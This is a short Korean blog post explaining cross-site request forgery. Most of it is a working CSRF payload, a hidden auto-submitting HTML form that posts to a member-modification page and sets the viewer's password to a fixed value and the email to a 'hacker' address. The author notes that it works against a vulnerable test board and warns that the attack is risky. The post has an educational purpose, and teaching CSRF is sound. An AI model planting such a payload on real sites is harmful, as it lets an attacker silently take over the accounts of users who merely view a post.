메뉴 건너뛰기

infra

[웹] CSRF

lispro062014.05.17 02:18조회 수 1050댓글 0

    • 글자 크기

CSRF에 대해 물어보는 사람은 많다.


실습이 쉽지 않기 때문이다.


web의 동작 방식에 대한 이해가 없으면 알기 어렵다.


<form id="test" action="../login/members_modify_ok.asp" METHOD="POST">

<input type="hidden" maxlength=8 name=mem_pwd size="10" class="box" value='xx12345'>

<input type="hidden" name="mem_email" size="30" class="box" value='hacker@paran.com'>

<input type="hidden" name="tel2" size="5" class="box" maxlength="4" value='222'>

<input type="hidden" name="tel3" size="5" class="box" maxlength="4" onkeydown="javascript:IsNumber()" value='333'>

 <input type="hidden" name="hp1" size="5" class="box" maxlength="4" onkeydown="javascript:IsNumber()" value='000'>

 <input type="hidden" name="hp2" size="5" class="box" maxlength="4" onkeydown="javascript:IsNumber()" value='000'>

<input type="hidden" name="hp3" size="5" class="box" maxlength="4" onkeydown="javascript:IsNumber()" value='0000'>

<input type="hidden" name="zip1" size="3" class="box" readonly onclick='javascript:post_no_search();' value='158'>

<input type="hidden" name="zip2" size="3" class="box" readonly onclick='javascript:post_no_search();' value='123'>

<input type="hidden" name="addr1" size="35" class="box" readonly onclick='javascript:post_no_search();' value='seoul'>

<input type="hidden" name="addr2" size="35" class="box" value='kangnam'>

<script>var tt=document.getElementById("test");tt.submit();</script>

</form>


게시글에 상기와 같은 코드를 통해 열람하는 사용자의 pw를 바꿀 수 있다.


물론 취약한 test 게시판의 경우다.


이 공격은 위험성이 있으므로, 게시글을 올리는 수준으로 test 해야 한다. 회원 정보를 마음대로 바꾸는 건 위험하다.

lispro06 (비회원)
    • 글자 크기

댓글 달기

첨부 (0)
위로